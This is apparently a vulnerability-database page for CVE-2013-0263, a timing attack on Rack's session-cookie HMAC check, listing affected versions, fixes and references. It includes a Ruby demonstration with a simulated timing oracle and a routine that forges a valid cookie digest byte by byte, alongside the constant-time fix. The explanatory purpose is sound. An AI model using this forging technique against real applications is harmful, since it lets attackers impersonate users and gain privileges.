CVE-2013-0263
medium
CVSS v3
—
CVSS v2
5.1
VIR risk
5.1
Description
Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5, 1.3.x before 1.3.10, 1.2.x before 1.2.8, and 1.1.x before 1.1.6 allows remote attackers to guess the session cookie, gain privileges, and execute arbitrary code via a timing attack involving an HMAC comparison function that does not run in constant time.
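The defect and its fix, shown as an added Ruby example that is not Rack's own code. It models the Rack 1.x cookie layout ("<base64 payload>--<hex HMAC-SHA1>") with a plain-string payload instead of a Marshal dump, uses a constructed secret, and names its own helpers (`leaky_compare`, `secure_compare`, `timing_oracle`, `forge_digest`); the attacker's timing measurement is replaced by a deterministic count of bytes examined so the attack is reproducible offline.

```ruby
require 'openssl'

# Constructed secret for this example only; the attacker is assumed not to know it.
SECRET = 'example-secret-not-for-real-use'.freeze

# Cookie layout as in Rack 1.x's Rack::Session::Cookie: "<base64 payload>--<hex HMAC-SHA1>".
# The payload is a plain string here rather than a Marshal dump, to keep the example short.
def sign(payload, secret = SECRET)
  data = [payload].pack('m0')
  "#{data}--#{OpenSSL::HMAC.hexdigest('SHA1', secret, data)}"
end

# Early-exit comparison modelled on what `digest == expected` does (a memcmp that stops
# at the first mismatch). The second value is how many bytes were examined: the quantity
# a remote attacker observes as response latency.
def leaky_compare(a, b)
  return [false, 0] unless a.bytesize == b.bytesize
  a.each_byte.with_index do |byte, i|
    return [false, i + 1] if byte != b.getbyte(i)
  end
  [true, a.bytesize]
end

# Constant-time comparison of the form the fixed releases adopted: fail early only on a
# length mismatch, then OR together the XOR of every byte pair so the loop never exits
# early and the time taken does not depend on where the strings differ.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.each_byte.with_index { |byte, i| diff |= byte ^ b.getbyte(i) }
  diff.zero?
end

VULNERABLE = ->(a, b) { leaky_compare(a, b).first }  # behaviour of the affected releases
FIXED      = ->(a, b) { secure_compare(a, b) }

# Verify a cookie with the given comparison; returns the payload, or nil if the MAC
# does not match or the cookie is malformed.
def verify(cookie, compare, secret = SECRET)
  data, digest = cookie.split('--', 2)
  return nil if digest.nil? || data.empty?
  expected = OpenSSL::HMAC.hexdigest('SHA1', secret, data)
  compare.call(digest, expected) ? data.unpack1('m0') : nil
rescue ArgumentError # invalid base64 in the payload
  nil
end

# Simulated server: answers an attacker's (data, guessed digest) with the timing signal.
# With the leaky comparison the signal is the number of bytes examined; with the
# constant-time comparison the attacker can only tell success from failure.
def timing_oracle(compare = :leaky, secret = SECRET)
  lambda do |data, guess|
    expected = OpenSSL::HMAC.hexdigest('SHA1', secret, data)
    if compare == :constant_time
      secure_compare(guess, expected) ? expected.length + 1 : expected.length
    else
      eq, examined = leaky_compare(guess, expected)
      eq ? examined + 1 : examined
    end
  end
end

# Attacker: recover a valid digest for attacker-chosen data one hex digit at a time,
# keeping the digit that makes the server examine one more byte. 40 positions * 16
# candidates = 640 queries, instead of 16**40 for a blind search. Against the
# constant-time oracle every candidate scores the same and the result is junk.
def forge_digest(data, oracle)
  guess = '0' * 40 # hex SHA-1 digest length
  40.times do |pos|
    guess[pos] = '0123456789abcdef'.each_char.max_by do |c|
      guess[pos] = c
      oracle.call(data, guess)
    end
  end
  guess
end

if __FILE__ == $PROGRAM_NAME
  cookie = sign('user_id=42')
  puts "legitimate cookie verifies (fixed):   #{verify(cookie, FIXED).inspect}"
  data = ['user_id=1'].pack('m0')
  forged = forge_digest(data, timing_oracle(:leaky))
  puts "forged via timing leak verifies:      #{verify("#{data}--#{forged}", VULNERABLE).inspect}"
  junk = forge_digest(data, timing_oracle(:constant_time))
  puts "forge against constant-time compare:  #{verify("#{data}--#{junk}", FIXED).inspect}"
end
```

The forged cookie carries attacker-chosen session data, which is why the description escalates from "guess the session cookie" to privilege gain: the server trusts whatever the valid MAC covers. Note that `secure_compare` still returns early on a length mismatch; that leaks only the digest length, which is public anyway. In a real deployment the per-byte difference is nanoseconds and must be recovered statistically over many requests, but the search cost is the same: linear in digest length rather than exponential.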
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
Upgrade to a fixed Rack release: 1.5.2, 1.4.5, 1.3.10, 1.2.8 or 1.1.6 (per the description above); the fix replaces the cookie HMAC check with a constant-time comparison.
Upstream advisory (rack_project): http://rack.github.com/
Vendor advisory (debian): https://security-tracker.debian.org/tracker/CVE-2013-0263
Third-party advisories (Secunia, via secalert@redhat.com): http://secunia.com/advisories/52134, http://secunia.com/advisories/52033
OS impact
| OS | Version | Status | Fixed in |
|---|---|---|---|
| debian | bookworm | fixed | 1.4.1-2.1 |
| debian | bullseye | fixed | 1.4.1-2.1 |
| debian | forky | fixed | 1.4.1-2.1 |
| debian | sid | fixed | 1.4.1-2.1 |
| debian | trixie | fixed | 1.4.1-2.1 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| rack_project | rack | 1.5.0 | 1.5.2 |
| rack_project | rack | 1.5.1 | 1.5.2 |
| rack_project | rack | 1.4.0 | 1.4.5 |
| rack_project | rack | 1.4.1 | 1.4.5 |
| rack_project | rack | 1.4.2 | 1.4.5 |
| rack_project | rack | 1.4.3 | 1.4.5 |
| rack_project | rack | 1.4.4 | 1.4.5 |
| rack_project | rack | 1.3.0 | 1.3.10 |
| rack_project | rack | 1.3.1 | 1.3.10 |
| rack_project | rack | 1.3.2 | 1.3.10 |
| rack_project | rack | 1.3.3 | 1.3.10 |
| rack_project | rack | 1.3.4 | 1.3.10 |
| rack_project | rack | 1.3.5 | 1.3.10 |
| rack_project | rack | 1.3.6 | 1.3.10 |
| rack_project | rack | 1.3.7 | 1.3.10 |
| rack_project | rack | 1.3.8 | 1.3.10 |
| rack_project | rack | 1.3.9 | 1.3.10 |
| rack_project | rack | 1.2.0 | 1.2.8 |
| rack_project | rack | 1.2.1 | 1.2.8 |
| rack_project | rack | 1.2.2 | 1.2.8 |
| rack_project | rack | 1.2.3 | 1.2.8 |
| rack_project | rack | 1.2.4 | 1.2.8 |
| rack_project | rack | 1.2.6 | 1.2.8 |
| rack_project | rack | 1.2.7 | 1.2.8 |
| rack_project | rack | 1.1.0 | 1.1.6 |
| rack_project | rack | 1.1.4 | 1.1.6 |
| rack_project | rack | 1.1.5 | 1.1.6 |
References
- https://nvd.nist.gov/vuln/detail/CVE-2013-0263
- http://lists.opensuse.org/opensuse-updates/2013-03/msg00048.html
- http://rack.github.com/
- http://rhn.redhat.com/errata/RHSA-2013-0686.html
- http://secunia.com/advisories/52033
- http://secunia.com/advisories/52134
- http://secunia.com/advisories/52774
- http://www.debian.org/security/2013/dsa-2783
- http://www.osvdb.org/89939
- https://bugzilla.redhat.com/show_bug.cgi?id=909071
- https://gist.github.com/codahale/f9f3781f7b54985bee94
- https://github.com/rack/rack/commit/0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07
- https://github.com/rack/rack/commit/9a81b961457805f6d1a5c275d053068440421e11
- https://groups.google.com/d/msg/rack-devel/xKrHVWeNvDM/4ZGA576CnK4J
- https://groups.google.com/forum/#%21msg/rack-devel/RnQxm6i13C4/xfakH81yWvgJ
- https://groups.google.com/forum/#%21msg/rack-devel/bf937jPZxJM/1s6x95vIhmAJ
- https://groups.google.com/forum/#%21msg/rack-devel/hz-liLb9fKE/8jvVWU6xYiYJ
- https://groups.google.com/forum/#%21msg/rack-devel/mZsuRonD7G8/DpZIOmMLbOgJ
- https://puppet.com/security/cve/cve-2013-0263
- https://twitter.com/coda/statuses/299732877745197056
- https://github.com/rack/rack